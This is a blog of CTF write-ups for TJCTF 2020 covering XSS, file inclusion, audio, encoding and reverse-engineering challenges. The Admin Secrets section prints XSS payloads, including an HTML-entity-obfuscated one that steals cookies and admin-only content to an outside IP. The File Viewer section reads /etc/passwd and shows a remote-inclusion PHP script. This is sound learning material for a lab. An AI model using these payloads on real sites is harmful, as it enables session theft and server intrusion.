<p><em>Blog - nlegall - <a href="https://blog.nlegall.fr/">blog.nlegall.fr</a> - 2020-06-02</em></p>
<h1>TJCTF2020</h1>
<p><em>2020-06-02 - nlegall</em></p>
<p><em><a href="https://tjctf.org">TJCTF 2020</a> - <a href="https://ctftime.org/event/928">CTFTime</a></em></p>
<p>I finished 58th (of 868 people who scored at least 5 points) with 980 points.</p>
<p><img alt="bilan.png" src="https://blog.nlegall.fr/images/tjctf/2020/bilan.png"></p>
<h2>Cryptography</h2>
<ul>
<li><a href="/tjctf2020-circles.html">Circles</a></li>
<li><a href="/tjctf2020-is-this-crypto.html">Is This Crypto?</a></li>
<li><a href="/tjctf2020-rsabc.html">RSABC</a></li>
<li><a href="/tjctf2020-tap-dancing.html">Tap Dancing</a></li>
<li><a href="/tjctf2020-titanic.html">Titanic</a></li>
<li><a href="/tjctf2020-typewriter.html">Typewriter</a></li>
</ul>
<h2>Web</h2>
<ul>
<li><a href="/tjctf2020-admin-secrets.html">Admin Secrets</a></li>
<li><a href="/tjctf2020-file-viewer.html">File Viewer</a></li>
<li><a href="/tjctf2020-login.html">Login</a></li>
<li><a href="/tjctf2020-moar-horse-4.html">Moar Horse 4</a></li>
<li><a href="/tjctf2020-sarah-palin-fanpage.html">Sarah Palin Fanpage</a></li>
<li><a href="/tjctf2020-weak-password.html">Weak Password</a></li>
</ul>
<h2>Reverse</h2>
<ul>
<li><a href="/tjctf2020-chord-encoder.html">Chord Encoder</a></li>
<li><a href="/tjctf2020-gym.html">Gym</a></li>
</ul>
<h2>Forensics</h2>
<ul>
<li><a href="/tjctf2020-hexillology.html">Hexillology</a></li>
<li><a href="/rtcp-basmati-rice-64.html">BASmati ricE 64</a></li>
<li><a href="/tjctf2020-ling-ling.html">Ling Ling</a></li>
<li><a href="/tjctf2020-rap-god.html">Rap God</a></li>
</ul>
<h2>Misc</h2>
<ul>
<li><a href="/tjctf2020-arabfunny.html">arabfunny</a></li>
<li><a href="/tjctf2020-censorship.html">Censorship</a></li>
<li><a href="#">Gamer W - soon</a></li>
<li><a href="/tjctf2020-zipped-up.html">Zipped Up</a></li>
</ul>
<h1>TJCTF2020 - Admin Secrets</h1>
<p><em>2020-06-02 - nlegall</em></p>
<p><em>solves : 72</em></p>
<div class="highlight"><pre><span></span><code>Points: 100
Written by avz92
See if you can get the flag from the admin at this website!
Hint: The admin can see something you can't. Check the page source.
</code></pre></div>
<p>After creating a new account, we can write a text and share it with everyone.</p>
<p><img alt="admin_secrets.png" src="https://blog.nlegall.fr/images/tjctf/2020/admin_secrets.png"></p>
<p>It looks like basic user input that could be exploited with an XSS attack.</p>
<p>Let's check whether it's vulnerable with some basic XSS code. We can get the admin cookie with the following code:</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s1">'DOMContentLoaded'</span><span class="p">,</span> <span class="kd">function</span><span class="p">(){</span><span class="k">new</span> <span class="nx">Image</span><span class="p">().</span><span class="nx">src</span><span class="o">=</span><span class="s2">"http://x.x.x.x/cookie.php?c="</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">;},</span> <span class="kc">false</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
</code></pre></div>
<p>We send our text and click on the admin button, then check the server log for incoming requests:</p>
<div class="highlight"><pre><span></span><code>"GET /cookie.php?c=hint=%22Check%20the%20admin%20console!\x5C012%22 HTTP/1.1"
</code></pre></div>
<p>Perfect! We have a working XSS in the form. Now we have to figure out where the flag is.</p>
<p>The admin cookie we got earlier gives us a hint: <code>"Check the admin console!"</code>. Maybe we can get something more if we have access to the admin console code.</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nb">document</span><span class="p">.</span><span class="nx">addEventListener</span><span class="p">(</span><span class="s1">'DOMContentLoaded'</span><span class="p">,</span> <span class="kd">function</span><span class="p">(){</span><span class="k">new</span> <span class="nx">Image</span><span class="p">().</span><span class="nx">src</span><span class="o">=</span><span class="s2">"http://x.x.x.x/cookie.php?c="</span><span class="o">+</span><span class="nx">$</span><span class="p">(</span><span class="s1">'.admin_console'</span><span class="p">).</span><span class="nx">children</span><span class="p">().</span><span class="nx">html</span><span class="p">();},</span> <span class="kc">false</span><span class="p">);</</span><span class="nt">script</span><span class="p">></span>
</code></pre></div>
<div class="highlight"><pre><span></span><code>"GET /cookie.php?c=%3Cbutton%20class=%22btn%20btn-primary%20flag-button%22%3EAccess%20Flag%3C/button%3E HTTP/1.1"
</code></pre></div>
<p>Decoded, this gives: <code>&lt;button class="btn btn-primary flag-button"&gt;Access Flag&lt;/button&gt;</code>. Great! We can access the flag by clicking the button. But first, it's worth checking whether a JS handler is attached to it. We can use the <a href="https://github.com/ruidfigueiredo/findHandlersJS/blob/master/findEventHandlers.js">findHandlersJS</a> code to dump the handler the same way as before and retrieve its source.</p>
<div class="highlight"><pre><span></span><code>"GET /?c=function(e){%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20$.ajax({%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20type:%20%22GET%22,%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20url:%20%22/admin_flag%22,%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20success:%20function(resp)%20{%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20flag=resp;$(%22 HTTP/1.1"
</code></pre></div>
<p>We get the start of an AJAX function:</p>
<div class="highlight"><pre><span></span><code>function(e){
$.ajax({
type: "GET",
url: "/admin_flag",
success: function(resp) {
flag=resp;$(
</code></pre></div>
<p>So the flag is read from the page <code>admin_flag</code> (I tried to access it with curl or a browser but was denied ^^).</p>
<p>We need the admin to perform the action for us. We can replace the previous XSS code with an AJAX GET that sends us the result in a request:</p>
<div class="highlight"><pre><span></span><code>&lt;IMG SRC=/ onerror="
document.addEventListener('DOMContentLoaded', function(){
$.ajax({
 type: 'GET',
 url: '/admin_flag',
 success: function(resp) {
 new Image().src='http://51.159.35.66/?c='+resp;
 }
 });
});"&gt;&lt;/img&gt;
</code></pre></div>
<p>Submit the form and click the button again.</p>
<div class="highlight"><pre><span></span><code>/?c=This%20post%20contains%20unsafe%20content.%20To%20prevent%20unauthorized%20access,%20the%20flag%20cannot%20be%20accessed%20for%20the%20following%20violations:%20Script%20tags%20found.%20Single%20quote%20found.%20Double%20quote%20found.%20Parenthesis%20found.
</code></pre></div>
<p>Hmm. It works, but the filter spotted it. Let's encode the JS code with HTML entities (<a href="https://mothereff.in/html-entities">https://mothereff.in/html-entities</a>):</p>
<div class="highlight"><pre><span></span><code><span class="p"><</span><span class="nt">IMG</span> <span class="na">SRC</span><span class="o">=</span><span class="s">/</span> <span class="na">onerror</span><span class="o">=</span><span class="s">&#x64;&#x6F;&#x63;&#x75;&#x6D;&#x65;&#x6E;&#x74;&#x2E;&#x61;&#x64;&#x64;&#x45;&#x76;&#x65;&#x6E;&#x74;&#x4C;&#x69;&#x73;&#x74;&#x65;&#x6E;&#x65;&#x72;&#x28;&#x27;&#x44;&#x4F;&#x4D;&#x43;&#x6F;&#x6E;&#x74;&#x65;&#x6E;&#x74;&#x4C;&#x6F;&#x61;&#x64;&#x65;&#x64;&#x27;&#x2C;&#x20;&#x66;&#x75;&#x6E;&#x63;&#x74;&#x69;&#x6F;&#x6E;&#x28;&#x29;&#x7B;&#xA;&#x24;&#x2E;&#x61;&#x6A;&#x61;&#x78;&#x28;&#x7B;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x74;&#x79;&#x70;&#x65;&#x3A;&#x20;&#x27;&#x47;&#x45;&#x54;&#x27;&#x2C;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x75;&#x72;&#x6C;&#x3A;&#x20;&#x27;&#x2F;&#x61;&#x64;&#x6D;&#x69;&#x6E;&#x5F;&#x66;&#x6C;&#x61;&#x67;&#x27;&#x2C;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x73;&#x75;&#x63;&#x63;&#x65;&#x73;&#x73;&#x3A;&#x20;&#x66;&#x75;&#x6E;&#x63;&#x74;&#x69;&#x6F;&#x6E;&#x28;&#x72;&#x65;&#x73;&#x70;&#x29;&#x20;&#x7B;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x6E;&#x65;&#x77;&#x20;&#x49;&#x6D;&#x61;&#x67;&#x65;&#x28;&#x29;&#x2E;&#x73;&#x72;&#x63;&#x3D;&#x27;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x35;&#x31;&#x2E;&#x31;&#x35;&#x39;&#x2E;&#x33;&#x35;&#x2E;&#x36;&#x36;&#x2F;&#x3F;&#x63;&#x3D;&#x27;&#x2B;&#x72;&#x65;&#x73;&#x70;&#x3B;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x7D;&#xA;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x7D;&#x29;&#x3B;&#xA;&#x7D;&#x29;&#x3B;</span><span class="p">></</span><span class="nt">img</span><span class="p">></span>
</code></pre></div>
<p>Submit again. Click the button. And VICTORY!</p>
<div class="highlight"><pre><span></span><code>"GET /?c=tjctf{st0p_st3aling_th3_ADm1ns_fl4gs} HTTP/1.1"
</code></pre></div>
<h1>TJCTF2020 - arabfunny</h1>
<p><em>2020-06-02 - nlegall</em></p>
<p><em>solves : 67</em></p>
<div class="highlight"><pre><span></span><code>Points: 40
Written by jpes707
So many sounds...
Hint: Listen to all the sounds. Which sound could possibly be used to encode a message?
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/449acd6124ee789182ced8c03a0a50664bdbe2bd22669455fceeca8acec9b718_arabfunny.mp3">arabfunny.mp3</a></p>
<p>We have a strange mp3 file with many different sounds, and we need to find the right one.</p>
<p>Around 1:02, we get a lot of sounds that look like phone tones. After some searching, I found that the phone uses <a href="https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling">DTMF</a> to encode each key press.</p>
<p>We can now isolate the segment from 1:02 to 1:20 to keep only this sound. Next we need a tool that can read the audio and give us back the key presses.</p>
<p>I tried phone-style applications, but they did not work since the sound was too noisy. I finally found one that can read directly from the audio file: <a href="https://github.com/EliasOenal/multimon-ng">multimon-ng</a>.</p>
<div class="highlight"><pre><span></span><code>╰─ multimon-ng -t wav -a DTMF /home/nlegall/ctf/tjctf/untitled.wav
multimon-ng <span class="m">1</span>.1.8
<span class="o">(</span>C<span class="o">)</span> <span class="m">1996</span>/1997 by Tom Sailer HB9JNX/AE4WA
<span class="o">(</span>C<span class="o">)</span> <span class="m">2012</span>-2019 by Elias Oenal
Available demodulators: POCSAG512 POCSAG1200 POCSAG2400 FLEX EAS UFSK1200 CLIPFSK FMSFSK AFSK1200 AFSK2400 AFSK2400_2 AFSK2400_3 HAPN4800 FSK9600 DTMF ZVEI1 ZVEI2 ZVEI3 DZVEI PZVEI EEA EIA CCIR MORSE_CW DUMPCSV X10 SCOPE
Enabled demodulators: DTMF
DTMF: <span class="m">1</span>
DTMF: <span class="m">1</span>
<span class="o">[</span>...<span class="o">]</span>
DTMF: <span class="m">2</span>
DTMF: <span class="m">5</span>
</code></pre></div>
<p>The output is: <code>1116106009991161002212330098111411710400955009990977771091011100880950500055204881122125</code>. It seems we have a lot of repetitions. Let's check the digits again and fix them: <code>116106099116102123098114117104095099097109101108095050052048112125</code>.</p>
<p>The result looks like decimal ASCII codes. I made a quick loop to decode it with Python:</p>
<div class="highlight"><pre><span></span><code><span class="o">>>></span> <span class="n">c</span> <span class="o">=</span> <span class="s2">"116106099116102123098114117104095099097109101108095050052048112125"</span>
<span class="o">>>></span> <span class="n">flag</span> <span class="o">=</span> <span class="s2">""</span>
<span class="o">>>></span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">23</span><span class="p">):</span>
<span class="o">...</span> <span class="n">flag</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">c</span><span class="p">[</span><span class="n">x</span> <span class="o">*</span> <span class="mi">3</span> <span class="o">-</span> <span class="mi">3</span><span class="p">]</span> <span class="o">+</span> <span class="n">c</span><span class="p">[</span><span class="n">x</span> <span class="o">*</span> <span class="mi">3</span> <span class="o">-</span> <span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="n">c</span><span class="p">[</span><span class="n">x</span> <span class="o">*</span> <span class="mi">3</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]))</span>
<span class="o">...</span>
<span class="o">>>></span> <span class="n">flag</span>
<span class="s1">'tjctf</span><span class="si">{bruh_camel_240p}</span><span class="s1">'</span>
</code></pre></div>
<h1>TJCTF2020 - Censorship</h1>
<p><em>2020-06-02 - nlegall</em></p>
<p><em>solves : 269</em></p>
<div class="highlight"><pre><span></span><code>Points: 30
Written by avz92
My friend has some top-secret government intel. He left a message, but the government censored him! They didn't want the information to be leaked, but can you find out what he was trying to say?
nc p1.tjctf.org 8003
</code></pre></div>
<p>Ok, no other clue, so let's try the command.</p>
<div class="highlight"><pre><span></span><code>╰─ nc p1.tjctf.org <span class="m">8003</span>
To prove you are worthy of this information, what is <span class="m">10</span> + <span class="m">5</span>?
<span class="m">15</span>
tjctf<span class="o">{[</span>CENSORED<span class="o">]}</span>
</code></pre></div>
<p>Hmm, we have the flag, but censored. Let's try piping the output of the command:</p>
<div class="highlight"><pre><span></span><code>╰─ nc p1.tjctf.org <span class="m">8003</span> <span class="p">|</span> more
To prove you are worthy of this information, what is <span class="m">4</span> + <span class="m">6</span>?
tjctf<span class="o">{</span>TH3_1llum1n4ti_I5_R3aL<span class="o">}</span>
</code></pre></div>
<p>Magic! The flag appears without the censorship and stays there!</p>
<h1>TJCTF2020 - Chord Encoder</h1>
<p><em>2020-06-02 - nlegall</em></p>
<p><em>solves : 228</em></p>
<div class="highlight"><pre><span></span><code>Points: 40
Written by boomo
I tried creating my own chords, but my encoded sheet music is a little hard to read. Please play me my song!
chord_encoder.py
Hint: Pathfinding? I just need some sick jams B)
</code></pre></div>
<p>We have three files:</p>
<ul>
<li>the chords-to-number table (<code>chords.txt</code>)</li>
</ul>
<div class="highlight"><pre><span></span><code>A 0112
B 2110
C 1012
D 020
E 0200
F 1121
G 001
a 0122
b 2100
c 1002
d 010
e 0100
f 1011
g 000
</code></pre></div>
<ul>
<li>the encoder</li>
</ul>
<div class="highlight"><pre><span></span><code>f = open('song.txt').read()
l = {'1':'A', '2':'B', '3':'C', '4':'D', '5':'E', '6':'F', '7':'G'}
chords = {}
for i in open('chords.txt').readlines():
    c, n = i.strip().split()
    chords[c] = n
s = ''
for i in f:
    c1, c2 = hex(ord(i))[2:]
    if c1 in l:
        c1 = l[c1]
    if c2 in l:
        c2 = l[c2]
    s += chords[c1] + chords[c2]
open('notes.txt', 'w').write(s)
</code></pre></div>
<ul>
<li>cipher text</li>
</ul>
<div class="highlight"><pre><span></span><code>1121112111211002112101121121001001210000101221121011200102000110120200101100100111211011001020020010111012011202001011112110121121011211211002112110020200101111210112020010111121010112102001121100211211011020020001010
</code></pre></div>
<p>Ok, we don't know the clear text, but we know how to generate the encoded output. So we can do it for each printable character:</p>
<div class="highlight"><pre><span></span><code>import string
l = {'1':'A', '2':'B', '3':'C', '4':'D', '5':'E', '6':'F', '7':'G'}
chords = {}
for i in open('chords.txt').readlines():
    c, n = i.strip().split()
    chords[c] = n
decode = {}
for i in string.printable:
    try:
        c1, c2 = hex(ord(i))[2:]
        if c1 in l:
            c1 = l[c1]
        if c2 in l:
            c2 = l[c2]
        print(i, chords[c1]+chords[c2])  ## print all possible combinations
        decode[chords[c1]+chords[c2]] = i  # reverse table: encoded chunk -> clear char
    except (ValueError, KeyError):
        pass  # no chord for hex digit 0, 8 or 9, or a single-digit hex code
</code></pre></div>
<div class="highlight"><pre><span></span><code>╰─ python a.py > correspondances.txt
╰─ cat correspondances.txt
<span class="m">1</span> <span class="m">10120112</span>
<span class="m">2</span> <span class="m">10122110</span>
<span class="m">3</span> <span class="m">10121012</span>
<span class="o">[</span>...<span class="o">]</span>
<span class="o">}</span> <span class="m">001010</span>
~ <span class="m">0010100</span>
</code></pre></div>
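<p>The hint mentions pathfinding for a reason: the chord strings are not prefix-free (<code>D</code> is <code>020</code> while <code>E</code> is <code>0200</code>, <code>d</code> is <code>010</code> while <code>e</code> is <code>0100</code>), so a naive left-to-right replacement can take a wrong branch and get stuck. The following decoder is an added example, not one of the author's scripts: it rebuilds the character codebook exactly as <code>chord_encoder.py</code> does, then runs a backtracking search over the ciphertext. A shortest-match greedy decoder is included for contrast. The chord table and ciphertext are copied from the files above; the short input <code>0200200020020</code> (the encoding of <code>ED</code>) is a constructed example of a dead end for the greedy approach.</p>

```python
import string

# Chord table (chords.txt) and encoded song (notes.txt), copied from the write-up.
CHORDS_TXT = """
A 0112
B 2110
C 1012
D 020
E 0200
F 1121
G 001
a 0122
b 2100
c 1002
d 010
e 0100
f 1011
g 000
"""
NOTES = (
    "1121112111211002112101121121001001210000101221121011200102000110120200"
    "1011001001112110110010200200101110120112020010111121101211210112112110"
    "0211211002020010111121011202001011112101011210200112110021121101102002"
    "0001010"
)

# Same hex-digit -> chord-name mapping as chord_encoder.py
HEX_TO_CHORD = {'1': 'A', '2': 'B', '3': 'C', '4': 'D', '5': 'E', '6': 'F', '7': 'G'}


def load_chords(text):
    """Parse 'name code' lines into {chord_name: digit_string}."""
    return dict(line.split() for line in text.split("\n") if line.strip())


def build_codebook(chords):
    """Encode every printable character exactly as chord_encoder.py does.

    A character whose hex form has a nibble of 0, 8 or 9 (no chord for it) or
    fewer than two hex digits cannot be encoded and is left out.
    """
    codebook = {}
    for ch in string.printable:
        try:
            c1, c2 = hex(ord(ch))[2:]
            codebook[ch] = chords[HEX_TO_CHORD.get(c1, c1)] + chords[HEX_TO_CHORD.get(c2, c2)]
        except (ValueError, KeyError):
            continue
    return codebook


def decode_greedy(notes, codebook):
    """Naive decoder: always take the shortest codeword matching at the cursor.

    Returns None when that choice leads to a dead end, which happens because
    one chord string can be a prefix of another (020 vs 0200).
    """
    by_length = sorted(codebook.items(), key=lambda kv: len(kv[1]))
    out, pos = [], 0
    while pos < len(notes):
        for ch, code in by_length:
            if notes.startswith(code, pos):
                out.append(ch)
                pos += len(code)
                break
        else:
            return None
    return "".join(out)


def decode_all(notes, codebook):
    """Backtracking search: every plaintext whose encoding is exactly `notes`."""
    results = []

    def walk(pos, acc):
        if pos == len(notes):
            results.append("".join(acc))
            return
        for ch, code in codebook.items():
            if notes.startswith(code, pos):
                acc.append(ch)
                walk(pos + len(code), acc)
                acc.pop()

    walk(0, [])
    return results


if __name__ == "__main__":
    cb = build_codebook(load_chords(CHORDS_TXT))
    print("greedy on ED :", decode_greedy("0200200020020", cb))
    print("search on ED :", decode_all("0200200020020", cb))
    print("search on song:", decode_all(NOTES, cb))
```

<p>The search returns a list because, in general, such a code may admit several parses; for this chord table and this ciphertext it finds a single one, which is the flag.</p>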
<p>And now, replace each encoded chunk with its clear character to recover the flag: <code>flag{zats_wot_1_call_a_meloD}</code>.</p>
<h1>TJCTF2020 - Circles</h1>
<p><em>2020-06-02 - nlegall</em></p>
<p><em>solves : 261</em></p>
<div class="highlight"><pre><span></span><code>Points: 10
Written by jpes707
Some typefaces are mysterious, like this one - its origins are an enigma wrapped within a riddle, indeed.
Hint: To obtain the flag, you should find the font that was used to encode the message in the picture. If you Google the description of the problem, the first website that pops up seems promising. Using a dictionary to guess/bruteforce words without finding the font will not help you. Each circle in the image represents an alphanumeric character that is part of the flag. The brackets and the underscore in the image are NOT part of the font used to encrypt the flag.
</code></pre></div>
<p>We have a picture with circles.</p>
<p><img alt="circles.png" src="https://blog.nlegall.fr/files/tjctf/2020/f5e809c4c49f2c7d607d77c99f07bbd8e9b46dfbe61779201f5b185ed6642de3_Circles.png"></p>
<p>We know it's from a specific font. After some searching, we found its name: <code>USF Circular Designs</code>.</p>
<p>We can use this website to preview all letters and digits (<code>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789</code>) and work out the correspondences: <a href="https://www.fonts.com/font/ultimate-symbol/usf-circular-designs/regular">www.fonts.com</a>.</p>
<p>We decode the image and get the flag: <code>tjctf{B3auT1ful_f0Nt}</code>.</p>
<h1>TJCTF2020 - File Viewer</h1>
<p><em>2020-06-02 - nlegall</em></p>
<p><em>solves : 257</em></p>
<div class="highlight"><pre><span></span><code>Points: 70
Written by saisree
So I've been developing this really cool site where you can read text files! It's still in beta mode, though, so there's only six files you can read.
Hint: The flag is in one directory somewhere on the server, all you have to do is find it...Oh wait. You don't have a shell, do you?
</code></pre></div>
<p>Start by visiting the website:</p>
<p><img alt="fileviewer.png" src="https://blog.nlegall.fr/images/tjctf/2020/fileviewer.png"></p>
<p>Clicking one of the links changes the URL to <code>http://file_viewer.tjctf.org/reader.php?file=apple.txt</code>, and the page shows the file's content.</p>
<p>Let's try to read another file, for example <code>/etc/passwd</code>: <code>http://file_viewer.tjctf.org/reader.php?file=/etc/passwd</code></p>
<p><img alt="fileviewer_passwd.png" src="https://blog.nlegall.fr/images/tjctf/2020/fileviewer_passwd.png"></p>
<p>The <code>file</code> parameter is used without any filtering, so we have a Local File Inclusion, and because the server also accepts a remote URL and executes what it fetches (an <code>include</code> with remote URLs allowed), a Remote File Inclusion as well. We can host a PHP script that lists the content of the current folder: it shows a folder called <code>i_wonder_whats_in_here</code>. Listing that folder in turn shows <code>flag.php</code>. Let's read it!</p>
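<p>Before the exploit script, here is the root cause next to a fix, written in Python as an added example (the challenge is PHP and this is not its source). The directory tree, the file contents and the <code>PUBLISHED</code> list are constructed for the demo; only <code>apple.txt</code> and <code>i_wonder_whats_in_here/flag.php</code> are names taken from the page. The hardened reader combines an allowlist (so unpublished files inside the web root, like <code>flag.php</code>, stay hidden) with a resolved-path check (so <code>../</code> and absolute paths cannot leave the web root).</p>

```python
"""Vulnerable versus hardened file reader (added example, not the challenge's code)."""
import os
import tempfile
from pathlib import Path
from typing import Optional

# The real site publishes six files; only one name appears on the page, so this list is constructed.
PUBLISHED = {"apple.txt", "banana.txt"}


def read_vulnerable(docroot: Path, name: str) -> str:
    """reader.php's behaviour: the parameter is used as-is.
    os.path.join() throws the docroot away when `name` is absolute (/etc/passwd),
    and '../' walks out of it. A PHP include() with allow_url_include would even
    fetch and run http:// URLs, which a plain file read cannot reproduce."""
    return Path(os.path.join(str(docroot), name)).read_text()


def read_hardened(docroot: Path, name: str) -> Optional[str]:
    """Two checks: the name must be on the published list, and the resolved path
    (symlinks and '..' included) must sit directly inside the docroot."""
    if name not in PUBLISHED:
        return None
    target = (docroot / name).resolve()
    if target.parent != docroot.resolve() or not target.is_file():
        return None
    return target.read_text()


def build_sandbox() -> Path:
    """Constructed tree: www/apple.txt, www/i_wonder_whats_in_here/flag.php, and a file outside www."""
    root = Path(tempfile.mkdtemp())
    www = root / "www"
    (www / "i_wonder_whats_in_here").mkdir(parents=True)
    (www / "apple.txt").write_text("apples are red\n")
    (www / "i_wonder_whats_in_here" / "flag.php").write_text("<?php\n // flag{constructed}\n?>\n")
    (root / "secret.txt").write_text("outside the web root\n")
    return www


if __name__ == "__main__":
    www = build_sandbox()
    for name in ["apple.txt", "../secret.txt", "i_wonder_whats_in_here/flag.php", "/etc/passwd"]:
        try:
            vuln = read_vulnerable(www, name)[:30].rstrip()
        except OSError as exc:
            vuln = f"error: {exc.strerror}"
        print(f"{name:35} vulnerable -> {vuln!r:40} hardened -> {read_hardened(www, name)!r}")
```

Note that a path-containment check alone would still have handed over <code>flag.php</code>, since it lives inside the web root: the allowlist is what closes that hole.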
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="c1">// use the url to the php script as filename: http://file_viewer.tjctf.org/reader.php?file=http://x.x.x.x/fileviewer_rfi.php</span>
<span class="c1">// list content</span>
<span class="nv">$dir</span> <span class="o">=</span> <span class="s1">'.'</span><span class="p">;</span>
<span class="nv">$files1</span> <span class="o">=</span> <span class="nb">scandir</span><span class="p">(</span><span class="nv">$dir</span><span class="p">);</span>
<span class="nv">$files2</span> <span class="o">=</span> <span class="nb">scandir</span><span class="p">(</span><span class="nv">$dir</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="nb">print_r</span><span class="p">(</span><span class="nv">$files1</span><span class="p">);</span>
<span class="nb">print_r</span><span class="p">(</span><span class="nv">$files2</span><span class="p">);</span>
<span class="c1">// read the flag file</span>
<span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s1">'i_wonder_whats_in_here/flag.php'</span><span class="p">);</span>
<span class="cp">?></span><span class="x"></span>
</code></pre></div>
<p>The remote script runs on the server, and its output shows up in the page source (the content of <code>flag.php</code> is raw PHP source, so the browser does not render it):</p>
<div class="highlight"><pre><span></span><code><span class="cp"><?php</span>
<span class="cp"> // tjctf{n1c3_j0b_with_lf1_2_rc3}</span>
<span class="cp">?></span>
</code></pre></div>TJCTF2020 - Gym2020-06-02T00:00:00+02:002020-06-02T00:00:00+02:00nlegalltag:blog.nlegall.fr,2020-06-02:/tjctf2020-gym.html<p><em>solves : 382</em></p>
<div class="highlight"><pre><span></span><code>Points: 20
Written by agcdragon
Aneesh wants to acquire a summer bod for beach week, but time is running out. Can you help him create a plan to attain his goal?
nc p1.tjctf.org 8008
</code></pre></div>
<p><a href="https://blog.nlegall.fr/files/tjctf/2020/bed9d7b7327958dab4d07b06772a032f3e97455e310956558579e8838762b5e2_gym">gym</a></p>
<p>We have a small game. The goal is to lose exactly 31 lbs (211 - 180) in 7 days.</p>
<div class="highlight"><pre><span></span><code><span class="err">╰─</span><span class="w"> </span><span class="p">.</span><span class="o">/</span><span class="n">bed9d7b7327958dab4d07b06772a032f3e97455e310956558579e8838762b5e2_gym</span><span class="w"></span>
<span class="n">I</span><span class="err">'</span><span class="n">m</span><span class="w"> </span><span class="n">currently</span><span class="w"> </span><span class="mi">211</span><span class="w"> </span><span class="n">lbs</span><span class="p">.</span><span class="w"> </span><span class="n">Can</span><span class="w"> </span><span class="n">I</span><span class="w"> </span><span class="n">be</span><span class="w"> </span><span class="n">exactly</span><span class="w"> </span><span class="mi">180</span><span class="vm">?</span><span class="w"> </span><span class="n">Help</span><span class="w"> </span><span class="n">me</span><span class="w"> </span><span class="k">out</span><span class="err">!</span><span class="w"></span>
<span class="c1">-------------------------</span>
<span class="n">Today</span><span class="w"> </span><span class="k">is</span><span class="w"> </span><span class="nf">day</span><span class="w"> </span><span class="mf">1.</span><span class="w"></span>
<span class="nf">Choose</span><span class="w"> </span><span class="n">an</span><span class="w"> </span><span class="nl">activity</span><span class="p">:</span><span class="w"></span>
<span class="o">[</span><span class="n">1</span><span class="o">]</span><span class="w"> </span><span class="n">Eat</span><span class="w"> </span><span class="n">healthy</span><span class="w"></span>
<span class="o">[</span><span class="n">2</span><span class="o">]</span><span class="w"> </span><span class="n">Do</span><span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="n">push</span><span class="o">-</span><span class="n">ups</span><span class="w"></span>
<span class="o">[</span><span class="n">3</span><span class="o">]</span><span class="w"> </span><span class="k">Go</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">a</span><span class="w"> </span><span class="n">run</span><span class="p">.</span><span class="w"></span>
<span class="o">[</span><span class="n">4</span><span class="o">]</span><span class="w"> </span><span class="n">Sleep</span><span class="w"> </span><span class="mi">8</span><span class="w"> </span><span class="n">hours</span><span class="p">.</span><span class="w"></span>
</code></pre></div>
<p>We load the binary in IDA and reverse it.</p>
<p>Each activity has its own function, which simply returns the number of lbs removed from the total:</p>
<h2>eat_healthy</h2>
<div class="highlight"><pre><span></span><code> <span class="nf">public</span> <span class="no">eat_healthy</span>
<span class="nf">eat_healthy</span> <span class="no">proc</span> <span class="no">near</span> <span class="c1">; CODE XREF: main+16E↓p</span>
<span class="nf">var_14</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">14</span><span class="no">h</span>
<span class="nf">var_4</span> <span class="err">=</span> <span class="no">dword</span> <span class="no">ptr</span> <span class="p">-</span><span class="mi">4</span>
<span class="c1">; __unwind {</span>
<span class="nf">push</span> <span class="no">rbp</span>
<span class="nf">mov</span> <span class="no">rbp</span><span class="p">,</span> <span class="no">rsp</span>
<span class="nf">mov</span> <span class="p">[</span><span class="no">rbp</span><span class="err">+</span><span class="no">var_14</span><span class="p">],</span> <span class="no">edi</span>
